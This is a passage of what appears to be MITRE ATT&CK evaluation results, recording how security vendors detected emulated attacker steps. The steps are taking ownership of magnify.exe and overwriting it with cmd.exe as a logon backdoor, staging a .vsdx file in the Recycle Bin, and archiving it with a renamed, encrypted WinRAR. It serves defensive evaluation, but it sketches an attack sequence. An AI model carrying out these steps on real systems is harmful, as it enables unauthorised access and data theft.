Telemetry showed powershell.exe executing reg with command-line arguments to check if terminal services were enabled. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment (Tainted)
The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed reg.exe executing with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed reg.exe execution with command-line arguments. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed execution of takeown.exe with command-line arguments on magnify.exe. [1] [2] [3] [4]
Enrichment (Configuration Change)
The capability enriched the execution of takeown.exe with \"Permission modifications\". The enrichment was added as a configuration change during the action and was not part of the original set of detections when the evaluation started. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because takeown.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed takeown.exe executing with command-line arguments. The process tree view showed takeown.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for takeown.exe performing activity related to swapping an accessibility features binary. The telemetry was tainted by a parent PowerShell alert. [1] [2]
Telemetry
Telemetry showed takeown.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown.exe with command-line arguments. Telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2]
FireEye
Enrichment
The capability enriched takeown.exe with an alert for Takeown Execution. The alert described how takeown can be used to change file ownership. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (takeown) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for takeown.exe changing the ownership of an accessibility feature executable. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed takeown.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown.exe to take ownership of magnify.exe. The telemetry was tainted by the parent \"New Windows service created\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched takeown.exe with a suspicious indicator that the takeown command was executed to obtain ownership of a file or directory. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown.exe. The telemetry was tainted by a trace detection on cmd.exe.. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed takeown.exe execution to change the file permissions on magnify.exe (tainted by prior alert on suspicious PowerShell command-line). [1] [2] [3] [4]
Palo Alto Networks
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification). [1] [2] [3] [4] [5]
Enrichment (Tainted)
The capability enriched takeown.exe executing with command-line arguments as changing permission or ownership of a file or folder. The data was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed takeown.exe execution to change the file permissions on magnify.exe. [1] [2]
SentinelOne
Enrichment (Tainted)
Telemetry showed takeown.exe execution with command-line arguments containing magnify.exe. The event was enriched to show that ownership of a file was taken over. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry within the process tree showed execution of icacls.exe with command-line arguments on magnify.exe. [1] [2] [3] [4]
Enrichment (Configuration Change)
The capability enriched the execution of icacls.exe with \"Permission modifications\". The enrichment was added as a configuration change during the action and was not part of the original set of detections when the evaluation started. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed execution of icacls.exe with command-line arguments. The process tree view showed icacls.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because icacls.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed icacls.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing icacls.exe with command-line arguments. Telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2]
FireEye
Enrichment
The capability enriched icacls.exe with an alert for Icacls Execution. The alert described how icacls can be used to display or change Windows file ACLs. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (icacls) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed icacls.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for icalcs.exe changing the permissions of an accessibility feature executable. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe running icacls.exe to modify magnify.exe access controls. The telemetry was tainted by the parent \"New Windows service created\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched icacls.exe with a suspicious indicator that full access permissions were given to certain users. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed powershell.exe executing icacls.exe. The telemetry was tainted by a trace detection on cmd.exe.. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed icacls.exe execution to change permissions on magnify.exe granting discretionary access to SYSTEM (tainted by prior alert on suspicious PowerShell command-line). [1] [2] [3] [4]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing icalcs with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5]
Enrichment
The capability enriched icalcs.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification). [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed icacls.exe execution to change permissions on magnify.exe granting discretionary access to SYSTEM. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed icacls.exe execution with command-line arguments containing magnify.exe. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed filemod events overwriting magnify.exe in the system directory. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for powershell.exe with a severity score of 51/100 when magnify.exe was replaced. The alert was also mapped to the correct ATT&CK Technique (T1015 - Accessibility Features). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed a file write of magnify.exe by powershell.exe in the system directory. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4] [5]
Cybereason
Telemetry (Tainted)
Telemetry showed creation and file write events for magnify.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3]
Endgame
Specific Behavior
A Specific Behavior alert was generated named "Persistence-Accessibility Features" based on magnifier.exe being overwritten. The alert was tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed the overwrite of magnify.exe and was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Enrichment (Delayed, Tainted)
The capability enriched the magnify.exe overwrite with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified magnifer.exe being overwritten with cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated for Suspicious Accessibility Features Replacement (BACKDOOR) based on magnifer.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was also generated for Accessibility Features File Write (Weak Signal) based on magnifier.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched cmd.exe as being renamed to another process and with a relevant ATT&CK Technique (Masquerading). Screenshot is not available due to sensitivity of rule logic. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the modification of an accessibility features binary known to be used for privilege escalation. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed powershell.exe overwriting magnify.exe with cmd.exe via the copy command. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry also showed a different view of the event with powershell.exe copying cmd.exe as magnify.exe in the system directory. The telemetry was tainted by parent "New Windows service created" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
Enrichment (Configuration Change, Tainted)
The capability enriched powershell.exe creating and writing magnify.exe to the system directory with the condition \"Creation of Sticky Keys File.\" The enrichment was tainted by parent \"New Windows service created\" alerts. The condition contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
McAfee
General Behavior
A General Behavior alert was generated for powershell.exe altering the attributes of an executable file under the Windows system folder. [1] [2] [3] [4]
Telemetry
Telemetry showed a file modification event for Magnifier.exe. [1] [2] [3] [4]
Microsoft
Specific Behavior
A Specific Behavior alert was generated for overwrite of magnify.exe indicating a sticky keys binary hijack for persistence was detected. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed powershell.exe overwriting magnify.exe with the new file containing the same hash for cmd.exe. Reputation metadata confirms magnify.exe is cmd.exe under the file names observed. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed file write events overwriting magnify.exe in the system directory as well as the change in the hash of the file. The telemetry was tainted by a parent alert on cmd.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3]
RSA
Telemetry
Telemetry showed a file write event on magnify.exe in the system directory. A search for "cmd" on CodeRed shows the hash value of magnify.exe matches cmd.exe. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of magnify.exe in the system directory from a file copy event for cmd.exe with matching hash values. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed powershell.exe executing the Get-ChildItem command. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed the decoded PowerShell script that was executed to recursively search for .vsdx files on Conficker's remote file share. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed an event with the execution of the Get-ChildItem command. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
Telemetry
Telemetry showed filemod events for the creation and write the .vsdx in the Recycle Bin. [1] [2]
Specific Behavior
A Specific Behavior alert was generated with a severity score of 60/100 and was correctly mapped to correct ATT&CK Technique (T1074 - Data Staged). [1] [2]
CrowdStrike
Telemetry
Telemetry showed the .vsdx file being written into the Recycle Bin. [1] [2]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed the .vsdx file being copied to the Recycle Bin, a \"likely location to stage files of interest.\" OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed creation of the .vsdx file in the Recycle Bin.  The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1]
Endgame
Telemetry (Tainted)
Telemetry showed creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by the parent powershell.exe alerts on " PowerShell with Unusual Arguments" and "PowerShell Network". [1] [2]
FireEye
Telemetry (Tainted)
Telemetry showed the creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by the parent PowerShell File Write alert. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated on the file write of the .vsdx named File Write To Root Of Recycle Bin (Weak Signal). The alert details explained how all legitimate files should be written to a subfolder of the recycle bin, and not to the root. [1] [2] [3]
F-Secure
Telemetry
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker (10.0.0.5) to the Recycle Bin as well as a file create event. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker to the Recycle Bin. The telemetry was tainted by the parent "Powershell executed encoded commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
Telemetry (Tainted)
Telemetry showed creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Specific Behavior
A Specific Behavior alert was generated for PowerShell creating a file in the Recycle Bin. The alert was tagged with the correct ATT&CK Tactic (Collection) and Technique (Data Staged). [1] [2]
Microsoft
None
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information available about what file is being copied or where the data is coming from). Vendor states that by default WDATP monitors activities around all the most used documents (doc, xls, ppt pdf, etc) at the time of test. [1]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed file read and write events for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) to the Recycle Bin. The telemetry was tainted by a parent alert on wscript.exe. [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of the .vsdx to the Recycle Bin. The activity seen during the lateral movement step tainted the telemetry because it was associated with the same story (Group ID). [1]
Carbon Black
None
No detection capability demonstrated for this procedure. Telemetry was available for the write file of the .vsdx file into the Recycle Bin, but no data was available that indicated it came from a network shared drive.
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry was available for the write file of the .vsdx into the Recycle Bin (no data was available that indicated it came from a network shared drive).
Cybereason
None
No detection capability demonstrated for this procedure. [1]
Endgame
None
No detection capability demonstrated for this procedure. Telemetry was available for the write file of shockwave_network.vsdx into the Recycle Bin, but no data was available that indicated it came from a network shared drive. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker (10.0.0.5) to the Recycle Bin. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker to the Recycle Bin. The telemetry was tainted by the parent "Powershell executed encoded commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information available about what file is being copied or where the data is coming from). Vendor states that by default WDATP monitors activities around all the most used documents (doc, xls, ppt pdf, etc) at the time of test. [1]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script engine reading files from network locations. The alert was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed a file read event for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker). The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed the .vsdx file copied from a network shared drive on Conficker. The activity seen during the lateral movement step tainted the telemetry because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the creation of recycler.exe. Binary metadata on recycler.exe indicated it was masquerading and had a digital signature and file metadata that matched the WinRAR utility. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed the SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed that recycler.exe was WinRAR via file metadata. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
None
No detection capability demonstrated for this procedure. Telemetry later identified recycler.exe as WinRAR during execution, no detections identified it as WinRAR upon file copy. [1] [2] [3]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the attacker placing the WinRAR utility on the system as recycler.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed the MD5 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by the parent PowerShell File Write alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry later identified recycler.exe as WinRAR during execution (no detections identified it as WinRAR upon file copy). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry
Telemetry showed the MD5/SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed file creation of recycler.exe on CodeRed. Binary reputation and metadata for recycler.exe shows hash and publisher signature as win.rar GmbH indicating the file is actually the WinRAR utility. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the MD5 and SHA256 hash values of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. Telemetry later identified recycler.exe as WinRAR during execution, no detections identified it as WinRAR upon file copy. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed file creation event for recycler.exe on CodeRed along with MD5, SHA1, and SHA256 hashes. Hashes could be used to look up information on the binary. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry showed the creation of recycler.exe. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed file write of recycler.exe by powershell.exe as well as the network connection over which the download occurred. The process tree view showed the parent powershell.exe process as tainted by a previous wscript.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed the file creation of recycler.exe by powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry (Tainted)
Telemetry showed the file creation of recycler.exe by powershell.exe. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it indicated the attacker placed recycler.exe on the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched powershell.exe writing recycler.exe with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed powershell.exe creating recycler.exe. [1] [2] [3] [4] [5] [6]
GoSecure
General Behavior (Configuration Change)
A General Behavior alert called "Policy Dropper Behavior" was generated based on three events occurring in the same parent process within a set time frame, a network connection (TCP Outbound to 192.168.0.5 over 443) followed by an executable file create (powershell.exe creating recycler.exe) followed by a process spawning from that executable (powershell.exe creating the recycler.exe process). The capability may have been modified after the start of the evaluation to create this alert, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe. The telemetry was tainted by parent \"Powershell executed encoded commands\" and \"Policy Dropper Behavior\" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry
Telemetry showed file creation event for recycler.exe [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe file (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
General Behavior (Tainted)
A General Behavior alert was generated for executables created to disk by the Windows scripting engine. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed the file create and write events for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Tainted)
A General Behavior alert was generated for PowerShell dropping an executable file to disk. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
Telemetry
Telemetry showed a write file event for recycler.exe. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of recycler.exe with hash value. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
Carbon Black
Telemetry
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. [1] [2] [3]
Enrichment
The capability enriched recycler.exe with the correct ATT&CK Technique (1002 - Data Compressed). [1] [2] [3]
CrowdStrike
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a RAR archive "written by a process with suspicious command line arguments." The alert showed the command-line details and was tagged with the correct ATT&CK Technique (Data Compressed) and Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because a .vsdx file was archived for likely exfiltration using the renamed RAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Cybereason
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert. [1]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched recycler.exe with a related ATT&CK Technique (T1022 - Data Encrypted) and Tactic (Exfiltration). The enrichment was tainted by a parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Specific Behavior (Tainted)
A Specific Behavior alert was generated on execution of recycler.exe named "Exfiltration-Encrypting Files with WinRar". The alert was tainted by parent Windows Script Executing PowerShell alert. [1] [2]
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data. The telemetry was tainted by parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
Enrichment
The capability enriched the file write of RAR with a second alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alerted noted that all legitimate files should be written to a subfolder of the Recycle Bin. [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched the command line output containing -hp with an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it indicated the attacker executed recycler.exe to create an encrypted RAR file old.rar. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (recycler) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
Telemetry
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. Additionally recycler.exe was identified as WinRAR via file metadata, including executable product and description. Telemetry also showed the creation of old.rar as the output of recycler.exe running. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe and executing the command-line arguments including the -hp flag indicating WinRAR utility execution with compression and encryption. The telemetry was tainted by parent "Powershell executed encoded commands" and "Policy Dropper Behavior" alerts Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
Enrichment (Configuration Change, Tainted)
The capability showed recycler.exe creating old.rar in the Recycle Bin and enriched the data with "Data Exfiltration Archiving" due to the archive file being created. The enrichment was tainted by parent "Powershell executed encoded command" alerts. The conditions contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, for data encryption and compression (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts). [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe [1]
RSA
Telemetry
Telemetry showed execution of recycler.exe with full command-line arguments, including -hp flag, indicating compression and encryption was used with a WinRAR utility. Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of recycler.exe with command-line arguments, including the -hp flag, indicating use of encryption and compression with a WinRAR utility. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. [1] [2]
Enrichment
The capability enriched recycler.exe with the correct ATT&CK Technique (1022 - Data Encrypted). [1] [2]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Specific Behavior (Tainted)
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed the flags -hp within the command line that indicated use of encryption, and the alert was mapped to a related ATT&CK Technique (Data Compressed) and the correct Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2]
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Cybereason
Telemetry (Tainted)
